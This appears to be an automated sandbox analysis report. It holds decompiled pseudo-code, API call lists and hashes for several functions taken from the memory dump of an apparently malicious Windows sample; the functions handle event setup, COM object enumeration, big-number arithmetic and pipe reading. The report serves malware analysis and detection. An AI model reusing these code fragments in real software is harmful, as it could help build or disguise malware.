Instruction ID: f26dcc5043c8502c6640fe28e92781e681d4d643451122d434be43215c34c731
Opcode Fuzzy Hash: 891443cace4a95de66063c29acb30efc363b429a1f9a18ae39eba141d281c9db
Instruction Fuzzy Hash: E2219C36900209BFDF018F68C884BAEBFB9EF84340F058054FE05AB315CB319A55CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF9864, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF9864(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xcfd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xcfd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0xcfd258 = _t6;
					 *0xcfd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xcfd254 = _t7;
					if(_t7 == 0) {
						 *0xcfd254 =  *0xcfd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x00cf986c
0x00cf9872
0x00cf9879
0x00000000
0x00cf98d3
0x00cf987b
0x00cf9883
0x00cf9890
0x00cf9890
0x00cf98d0
0x00000000
0x00cf98d0
0x00cf9892
0x00cf9892
0x00cf9897
0x00cf98a9
0x00cf98ae
0x00cf98b4
0x00cf98ba
0x00cf98c1
0x00cf98c3
0x00cf98c3
0x00000000
0x00cf98ca
0x00cf988c
0x00000000
0x00000000
0x00cf988e
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00CF103A,?,?,00000001,?,?,?,00CF91B4,?), ref: 00CF986C
GetVersion.KERNEL32(?,00000001,?,?,?,00CF91B4,?), ref: 00CF987B
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00CF91B4,?), ref: 00CF9897
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00CF91B4,?), ref: 00CF98B4
GetLastError.KERNEL32(?,00000001,?,?,?,00CF91B4,?), ref: 00CF98D3

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 3e6529fffa13dc2b925c637b532b6dd7174b3c4d86a79613fd7c1663274322f3
Instruction ID: 0493a9f3a0a2aa5339d4a0e94c7b0b0fda12fa90754c4c1fc5e74d20cd9b847b
Opcode Fuzzy Hash: 3e6529fffa13dc2b925c637b532b6dd7174b3c4d86a79613fd7c1663274322f3
Instruction Fuzzy Hash: BEF0A97074034AEBEBA08B24AE09B3D3BA2E742781F10441AE713C61F0DB70C802CB57

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2CC3, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00CF2CC3(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0xcfd2a4; // 0x247a5a8
					_t5 = _t103 + 0xcfe038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0xcfc2a8);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0xcfd2a4; // 0x247a5a8
												_t28 = _t109 + 0xcfe0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0xcfd2a4; // 0x247a5a8
														_t33 = _t79 + 0xcfe078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x00cf2cc8
0x00cf2cd1
0x00cf2cd2
0x00cf2cd6
0x00cf2cdc
0x00cf2ce2
0x00cf2ceb
0x00cf2cf1
0x00cf2cfb
0x00cf2cfd
0x00cf2d03
0x00cf2d08
0x00cf2d13
0x00cf2d19
0x00cf2d1e
0x00cf2e40
0x00cf2d24
0x00cf2d24
0x00cf2d31
0x00cf2d37
0x00cf2d3d
0x00cf2d41
0x00cf2d47
0x00cf2d54
0x00cf2d58
0x00cf2d5e
0x00cf2d61
0x00cf2d69
0x00cf2d6a
0x00cf2d6e
0x00cf2d72
0x00cf2d75
0x00cf2d78
0x00cf2d7e
0x00cf2d87
0x00cf2d8d
0x00cf2d8e
0x00cf2d91
0x00cf2d92
0x00cf2d93
0x00cf2d9b
0x00cf2d9c
0x00cf2d9d
0x00cf2d9f
0x00cf2da3
0x00cf2da7
0x00000000
0x00000000
0x00cf2dad
0x00cf2db6
0x00cf2dbc
0x00cf2dc6
0x00cf2dca
0x00cf2dcc
0x00cf2dd9
0x00cf2ddd
0x00cf2de5
0x00cf2dea
0x00cf2dfc
0x00cf2dfe
0x00cf2e04
0x00cf2e04
0x00cf2e0d
0x00cf2e0d
0x00cf2e0f
0x00cf2e15
0x00cf2e15
0x00cf2e18
0x00cf2e1e
0x00cf2e21
0x00cf2e2a
0x00000000
0x00000000
0x00000000
0x00cf2e2a
0x00cf2d7e
0x00cf2d78
0x00cf2d61
0x00cf2e30
0x00cf2e30
0x00cf2e36
0x00cf2e36
0x00cf2e3c
0x00cf2e3c
0x00cf2e45
0x00cf2e4b
0x00cf2e4b
0x00cf2d08
0x00cf2e54

APIs

SysAllocString.OLEAUT32(00CFC2A8), ref: 00CF2D13
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00CF2DF4
SysFreeString.OLEAUT32(00000000), ref: 00CF2E0D
SysFreeString.OLEAUT32(?), ref: 00CF2E3C

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 36a79c857f105387d1094dc0ce5c770672bcff8afcf42f4d5e2cc9d0447a5d6a
Instruction ID: 0e7e32d3298221f8ec343dd336d2d3e878037bdcbdb0f185602bea7acae3a5b1
Opcode Fuzzy Hash: 36a79c857f105387d1094dc0ce5c770672bcff8afcf42f4d5e2cc9d0447a5d6a
Instruction Fuzzy Hash: 95515075D00519EFCB04DFA8C9889AEF7BAEF88701B244594EA15EB320D7319D42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1721, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00CF1721(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00CF551C(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00CF11C2(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00CF6042(_t101,  &_v236, _a8, _t96 - _t81);
					E00CF6042(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00CF11C2(_t101,  &E00CFD1B0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00CF11C2(_a16, _a4);
						E00CF18BC(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00CFB048();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00CFB042();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00CF5F2D(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00CF901A(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00CF923D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00CFD1B0) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00cf1724
0x00cf1730
0x00cf1736
0x00cf173b
0x00cf173f
0x00cf189c
0x00cf18a0
0x00cf18a0
0x00cf1745
0x00cf1749
0x00cf174d
0x00cf1750
0x00cf175b
0x00cf1761
0x00cf1766
0x00cf1769
0x00cf1783
0x00cf178f
0x00cf1798
0x00cf17a2
0x00cf17a7
0x00cf17a9
0x00cf17ac
0x00cf185a
0x00cf1860
0x00cf1871
0x00cf1884
0x00cf1894
0x00000000
0x00cf1899
0x00cf17b5
0x00cf17bc
0x00cf17c0
0x00cf17c6
0x00cf17c8
0x00cf17ca
0x00cf17cc
0x00cf17ce
0x00cf17d8
0x00cf17dd
0x00cf17df
0x00cf17e1
0x00cf17e2
0x00cf17e3
0x00cf17e4
0x00cf17eb
0x00cf17f2
0x00cf17f5
0x00cf17f5
0x00cf17c2
0x00cf17c2
0x00cf17c2
0x00cf17fd
0x00cf1805
0x00cf180e
0x00cf1813
0x00cf1813
0x00cf1818
0x00000000
0x00000000
0x00cf181a
0x00cf181d
0x00cf1827
0x00000000
0x00000000
0x00cf1829
0x00cf1829
0x00cf1833
0x00cf1813
0x00cf1818
0x00000000
0x00000000
0x00000000
0x00cf1818
0x00cf183d
0x00cf1840
0x00cf1843
0x00cf184a
0x00cf184a
0x00cf1857
0x00000000
0x00cf1857
0x00cf1752
0x00cf1756
0x00cf1757
0x00cf1759
0x00000000
0x00000000
0x00000000
0x00cf1759
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00CF17CE
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00CF17E4
memset.NTDLL ref: 00CF1884
memset.NTDLL ref: 00CF1894

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 8c3d4d33c7d14ed34bbe674eab9e1db68c9e41f858fa7bcb23a973dbe3331e5e
Instruction ID: bd770c5571d262db3d199a9ac60e4fb3835347f0eba5cb51142a29b15026aa0d
Opcode Fuzzy Hash: 8c3d4d33c7d14ed34bbe674eab9e1db68c9e41f858fa7bcb23a973dbe3331e5e
Instruction Fuzzy Hash: 21418171A0021DEBDB50AFA8CC41BFE7775EF44310F14852AFA1AA7181DB70AE45DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2303, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00CF2303(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0xcfd138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0xcfd168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E00CF8D59(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0xcfd138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E00CF677C(_v16);
							if(_t58 == 0) {
								_t58 = E00CF1BFD(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E00CF9837( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E00CF9837( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}

0x00cf2312
0x00cf2317
0x00cf2319
0x00cf231e
0x00cf231f
0x00cf2324
0x00cf2325
0x00cf2330
0x00cf2361
0x00cf2366
0x00cf2429
0x00cf242c
0x00cf2432
0x00cf2432
0x00cf2373
0x00cf237b
0x00cf2426
0x00000000
0x00cf2426
0x00cf2386
0x00cf238b
0x00cf2390
0x00cf2418
0x00cf2419
0x00cf2419
0x00cf241f
0x00000000
0x00cf241f
0x00cf2396
0x00cf2398
0x00cf239e
0x00cf239f
0x00cf239f
0x00cf23a2
0x00cf23a5
0x00cf23ab
0x00cf23b0
0x00cf23b1
0x00cf23b6
0x00cf23b9
0x00cf23c4
0x00000000
0x00000000
0x00cf23cc
0x00cf23d4
0x00cf23fd
0x00cf2400
0x00cf2407
0x00cf2412
0x00cf2412
0x00000000
0x00cf2407
0x00cf23e0
0x00cf23e4
0x00000000
0x00000000
0x00cf23e6
0x00cf23eb
0x00000000
0x00000000
0x00cf23ed
0x00cf23ed
0x00cf23f2
0x00000000
0x00000000
0x00cf23f4
0x00cf23f5
0x00cf23f8
0x00cf23f8
0x00cf239f
0x00cf2338
0x00cf2340
0x00cf2359
0x00cf235b
0x00000000
0x00000000
0x00000000
0x00cf235b
0x00cf234c
0x00cf2350
0x00000000
0x00000000
0x00cf2356
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 00CF2319
GetLastError.KERNEL32 ref: 00CF2332

Part of subcall function 00CF9837: WaitForMultipleObjects.KERNEL32(00000002,00CFA9FB,00000000,00CFA9FB,?,?,?,00CFA9FB,0000EA60), ref: 00CF9852

ResetEvent.KERNEL32(?), ref: 00CF23AB
GetLastError.KERNEL32 ref: 00CF23C6

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID:
API String ID: 2394032930-0
Opcode ID: 9ca52acf6e43ad4b810e40da3564ccf78be3bcf0a280d0aaffaa3eb30a2aa5bc
Instruction ID: 03ee2780e6b3b285a0e49bc259271826bb1cc1e6cc152ad43ddfb0f3de935cb7
Opcode Fuzzy Hash: 9ca52acf6e43ad4b810e40da3564ccf78be3bcf0a280d0aaffaa3eb30a2aa5bc
Instruction Fuzzy Hash: BD31E732A0060CEBCB62DBA5CC44F7E7BB9EF84360F254524E621D71A0DB70DA45EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2997, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CF2997(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t18;
				void* _t24;
				signed int* _t27;
				CHAR* _t29;
				long _t30;
				intOrPtr* _t31;

				_t6 =  *0xcfd270; // 0xd448b889
				_t31 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xcfd2a4; // 0x247a5a8
				_t3 = _t8 + 0xcfe862; // 0x61636f4c
				_t24 = 0;
				_t29 = E00CF5FC5(_t3, 1);
				if(_t29 != 0) {
					_t24 = CreateEventA(0xcfd2a8, 1, 0, _t29);
					E00CF677C(_t29);
				}
				_t12 =  *0xcfd25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t31 == 0) {
					L12:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t30 = E00CF8D99(_t31, 0);
					if(_t30 == 0 && _t24 != 0) {
						_t30 = WaitForSingleObject(_t24, 0x4e20);
					}
					if(_t27 != 0 && _t30 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E00CF244A();
					if(_t18 != 0) {
						goto L12;
					}
					_push(0x20);
					_push( *_t31);
					E00CFD110();
					if(_t18 != 0) {
						 *_t18 = 0;
						_t18 = _t18 + 2;
					}
					_t30 = E00CF66F6(0,  *_t31, _t18, 0);
					if(_t30 == 0) {
						if(_t24 == 0) {
							L22:
							return _t30;
						}
						_t30 = WaitForSingleObject(_t24, 0x4e20);
						if(_t30 == 0) {
							L20:
							if(_t24 != 0) {
								CloseHandle(_t24);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x00cf2998
0x00cf299f
0x00cf29a9
0x00cf29ad
0x00cf29b3
0x00cf29c2
0x00cf29c9
0x00cf29cd
0x00cf29df
0x00cf29e1
0x00cf29e1
0x00cf29e6
0x00cf29ed
0x00cf2a44
0x00cf2a44
0x00cf2a4a
0x00cf2a4c
0x00cf2a4c
0x00cf2a56
0x00cf2a5a
0x00cf2a6c
0x00cf2a6c
0x00cf2a70
0x00cf2a76
0x00cf2a76
0x00000000
0x00cf29fd
0x00cf29fd
0x00cf2a04
0x00000000
0x00000000
0x00cf2a06
0x00cf2a08
0x00cf2a0b
0x00cf2a13
0x00cf2a17
0x00cf2a1b
0x00cf2a1b
0x00cf2a28
0x00cf2a2c
0x00cf2a30
0x00cf2a85
0x00cf2a8b
0x00cf2a8b
0x00cf2a3e
0x00cf2a42
0x00cf2a79
0x00cf2a7b
0x00cf2a7e
0x00cf2a7e
0x00000000
0x00cf2a7b
0x00cf2a42
0x00000000
0x00cf2a2c

APIs

Part of subcall function 00CF5FC5: lstrlen.KERNEL32(00CF5073,00000000,00000000,00000027,00000005,00000000,00000000,00CF56A8,74666F53,00000000,00CF5073,00CFD00C,?,00CF5073), ref: 00CF5FFB
Part of subcall function 00CF5FC5: lstrcpy.KERNEL32(00000000,00000000), ref: 00CF601F
Part of subcall function 00CF5FC5: lstrcat.KERNEL32(00000000,00000000), ref: 00CF6027

CreateEventA.KERNEL32(00CFD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00CF4D6D,?,00000001,?), ref: 00CF29D8

Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788

WaitForSingleObject.KERNEL32(00000000,00004E20,00CF4D6D,00000000,00000000,?,00000000,?,00CF4D6D,?,00000001,?,?,?,?,00CF28F1), ref: 00CF2A38
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00CF4D6D,?,00000001,?), ref: 00CF2A66
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00CF4D6D,?,00000001,?,?,?,?,00CF28F1), ref: 00CF2A7E

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 61e22a9f8efc214fde79be0a6422d0352f087ae26f1fef27043c8b341f66ba8e
Instruction ID: e2b8d419598042d684d80d685e40ee28e8a2d5032d2e285a99c73f628b8abb62
Opcode Fuzzy Hash: 61e22a9f8efc214fde79be0a6422d0352f087ae26f1fef27043c8b341f66ba8e
Instruction Fuzzy Hash: 7321073260031EABC7B15BAC9D84B7F77A9EF88710B150625FB62D7164DB70CE01A653

Uniqueness

Uniqueness Score: -1.00%

Function 00CF4CBE, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00CF4CBE(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00CF56DD(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00CF4DE0(_t23);
						}
					}
					return _t38;
				}
				if(E00CF576C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xcfd2a8, 1, 0,  *0xcfd340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00CF215A(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00CF6791(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00CF3822(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00CF2997( &_v32, _t39);
					goto L13;
				}
			}

0x00cf4cbe
0x00cf4ccb
0x00cf4cd1
0x00cf4cd2
0x00cf4cd3
0x00cf4cd4
0x00cf4cd5
0x00cf4cd9
0x00cf4ce5
0x00cf4ce9
0x00cf4d71
0x00cf4d71
0x00cf4d74
0x00cf4d76
0x00cf4d7e
0x00cf4d7e
0x00cf4d84
0x00cf4d87
0x00cf4d87
0x00cf4d84
0x00cf4d92
0x00cf4d92
0x00cf4cfc
0x00cf4cfe
0x00cf4cfe
0x00cf4d15
0x00cf4d19
0x00cf4d1c
0x00cf4d27
0x00cf4d2e
0x00cf4d2e
0x00cf4d37
0x00cf4d3b
0x00cf4d49
0x00cf4d3d
0x00cf4d3d
0x00cf4d3e
0x00cf4d3f
0x00cf4d40
0x00cf4d41
0x00cf4d42
0x00cf4d42
0x00cf4d4e
0x00cf4d51
0x00cf4d55
0x00cf4d57
0x00cf4d57
0x00cf4d5e
0x00000000
0x00cf4d60
0x00cf4d60
0x00cf4d6d
0x00000000
0x00cf4d6d

APIs

CreateEventA.KERNEL32(00CFD2A8,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,00CF28F1,?,00000001,?), ref: 00CF4D0F
SetEvent.KERNEL32(00000000,?,?,?,00CF28F1,?,00000001,?,00000002,?,?,00CF50A1,?), ref: 00CF4D1C
Sleep.KERNEL32(00000BB8,?,?,?,00CF28F1,?,00000001,?,00000002,?,?,00CF50A1,?), ref: 00CF4D27
CloseHandle.KERNEL32(00000000,?,?,?,00CF28F1,?,00000001,?,00000002,?,?,00CF50A1,?), ref: 00CF4D2E

Part of subcall function 00CF215A: WaitForSingleObject.KERNEL32(00000000,?,?,?,00CF4D4E,?,00CF4D4E,?,?,?,?,?,00CF4D4E,?), ref: 00CF2234

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

